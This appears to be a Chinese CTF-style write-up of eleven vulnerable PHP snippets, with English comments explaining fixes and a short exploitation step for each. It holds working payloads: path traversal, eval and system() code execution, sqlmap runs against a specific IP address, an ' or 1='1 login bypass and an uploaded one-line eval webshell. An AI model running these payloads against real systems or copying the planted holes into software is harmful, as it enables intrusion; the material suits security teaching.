1.文件包含漏洞
源码
<?php
// File inclusion: the request parameter is used verbatim as the include path, so any file the
// web-server process can read is includable and, if it contains PHP, executed (remote URLs too
// when allow_url_include is on). Fix: map the parameter to a fixed allowlist of known page keys
// and include only the mapped path; never pass a request value to include/require.
$file=$_GET['file'];
include $file;
?>
漏洞利用
/about.php?file=../flag
2.代码执行漏洞
源码
// Remote code execution: arbitrary PHP from any request channel (GET, POST, cookie — $_REQUEST
// merges them) is evaluated, and the @ only hides the resulting warnings from the logs. There is
// no safe way to eval request data; remove the call, and flag eval() over request input in code
// review and static analysis.
@eval($_REQUEST['c']);
漏洞利用
/config.php?c=system('cat ../flag');
3.任意文件读取漏洞
源码
<?php
include 'header.php';
// Arbitrary file read: the path comes straight from the request and file_exists() only confirms
// that it exists, so ../ sequences and absolute paths reach any file the web-server user can read.
// Fix: resolve with realpath() and require the result to lie under a fixed base directory (or use
// a basename()-only allowlist), then check is_file() before opening.
$file_path = $_GET['path'];
if(file_exists($file_path)){
// fopen() returns false for a directory or unreadable file; the result is never checked and the
// handle is never fclose()d.
$fp = fopen($file_path,"r");
$str = fread($fp,filesize($file_path));
// Raw file bytes are echoed into HTML without htmlspecialchars(), so markup inside the file is
// rendered rather than displayed.
echo $str = str_replace("\r\n","<br />",$str);
}
?>
漏洞利用
/contact.php?path=../flag
4.代码执行漏洞
源码
<?php
// OS command execution: the POST field is handed unmodified to system(), which runs it through
// the shell as the web-server user. No escaping makes a whole user-supplied command line safe
// (escapeshellarg() protects individual arguments of a fixed command); the fix is to remove the
// call. Detection: alert on system()/exec()/passthru() reachable from request superglobals.
$shell=$_POST['shell'];
system($shell);
// The emptiness check runs after system() has already executed; it only decides whether the
// rest of the page is rendered.
if($shell !=""){
exit();
}
?>
漏洞利用
ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag
5.代码执行漏洞
源码
<?php
include 'header.php';
// Remote code execution: arbitrary PHP from any request channel ($_REQUEST merges GET, POST
// and cookie) is evaluated, with @ suppressing the warnings that would otherwise reach the logs.
// Remove the call — request data can never be safely passed to eval().
@eval($_REQUEST['aa']);
?>
漏洞利用
/index.php?aa=system('cat ../flag');
6.SQL注入漏洞
源码
<?php
include 'header.php';
include_once('config.php');
if (!empty($_GET['id'])) {
$id=$_GET['id'];
// SQL injection: $id is interpolated into the statement unquoted, so the request controls the
// rest of the WHERE clause. Fix with a prepared statement —
// $stmt = mysqli_prepare($dbc, 'SELECT * FROM news WHERE id=?'); mysqli_stmt_bind_param($stmt, 'i', $id);
// — and validate id as an integer before it reaches the query.
$query = "SELECT * FROM news WHERE id=$id";
$data = mysqli_query($dbc,$query);
}
// When id is absent (or "0", which empty() also treats as empty) $data is undefined and this
// call receives null, which on PHP 8 raises a TypeError; the mysqli error is exposed to the
// client if display_errors is on.
$com = mysqli_fetch_array($data);
?>
漏洞利用
#sqlmap检测
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1
#列出所有数据库
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 --dbs
#列出指定数据库的表
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 -D cyber --tables
7.代码执行漏洞
源码
<?php
// OS command execution: the POST field is passed straight to system() and runs in the shell as
// the web-server user. Escaping cannot repair this — escapeshellarg() applies to arguments of a
// fixed command, not to a caller-supplied command line — so the call has to go. Detection:
// alert on system()/exec()/passthru() fed from request superglobals.
$shell=$_POST['shell'];
system($shell);
// Checked only after the command has run; this gates page rendering, not execution.
if($shell !=""){
exit();
}
?>
漏洞利用
ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag
8.万能钥匙
源码
<?php
include_once('config.php');
if (!empty($_POST['username'])) {
$user=$_POST['username'];
$pass=$_POST['password'];
// SQL injection in the authentication query: both fields are interpolated into the string, so
// a quote in either one rewrites the WHERE clause and a row comes back without a valid password.
// Fix: mysqli_prepare() with two bound string parameters; store passwords with password_hash()
// and compare with password_verify() in PHP rather than inside the SQL.
$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
$data = mysqli_query($dbc,$query);
// The row count is the only authentication gate; the credential comparison happens entirely in
// the database. mysqli_query() returning false on error is not handled.
if (mysqli_num_rows($data) == 1) {
$row = mysqli_fetch_array($data);
// No session_regenerate_id() on login (session fixation) — assuming session_start() happens in
// config.php; verify there.
$_SESSION['username'] = $row['user_name'];
header('Location: ./admin/index.php');
}else{
// Reflected XSS and credential echo: the submitted username and password are written back into
// the HTML unescaped. Wrap in htmlspecialchars() and never echo the password at all.
echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
}
}
?>
漏洞利用
' or 1='1
9.信息泄露
源码
<h3>flag:<?php /* Information disclosure: a secret file is read by shelling out and printed into
every response with no authentication. Remove the call; a request handler should not spawn a shell
to read secrets, and the file should not be readable by the web-server user in the first place. */ system("cat /flag")?></h3>
10.任意命令执行
源码
<?php
$p=$_GET['p'];
// Reflected XSS: the parameter is echoed into the page without htmlspecialchars().
echo $p;
// OS command execution: the same parameter is then run as a shell command via exec(). No
// escaping makes a whole user-supplied command line safe; remove the call. exec() returns only
// the last line of output, which is what var_dump() prints below.
$q=exec($p);
var_dump($q);
?>
漏洞利用
/admin/header.php?p=cat /flag
11.文件上传漏洞
源码
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
// $error, $size and $type are read but never checked; $type is client-supplied and not
// trustworthy in any case.
$type=$_FILES['pic']['type'];
try{
if($name!=="")
{
// Unrestricted upload: the stored suffix is the last four characters of the client-chosen
// filename (not a parsed extension — ".jpeg" becomes "jpeg", ".php" stays ".php"), so a PHP
// file lands under the web root and is executed on request. Fix: allowlist extensions and
// verify content, store under a server-generated name, and keep the upload directory outside
// the document root or with PHP execution disabled.
$name1=substr($name,-4);
if(is_uploaded_file($tmpName)){
$time=time();
// Destination is unix time plus the client suffix, and the full path is echoed back on success.
$rootpath='./upload/'.$time.$name1;
// Handle is never fclose()d; the "or die" branch cannot throw, so the catch below never fires.
$file=fopen($tmpName, "r") or die('No such file!');
$content=fread($file, filesize($tmpName));
// A single-keyword blocklist on the content is not a security control: it neither detects PHP
// code nor prevents the stored file from executing.
if(strstr($content,'fuck')){
exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
}
if(!move_uploaded_file($tmpName,$rootpath)){
echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
exit;
}
}
// Discloses the exact stored path to the uploader.
echo "上传成功:/upload/".$time.$name1;
}
}
// None of the calls above throw Exception (they return false or die()), so this handler is
// effectively dead code.
catch(Exception $e)
{
echo "ERROR";
}
漏洞利用
#传入一句话木马1.php
<?php @eval($_REQUEST['c']);?>
/admin/upload/1718338939.php?c=system('cat /flag');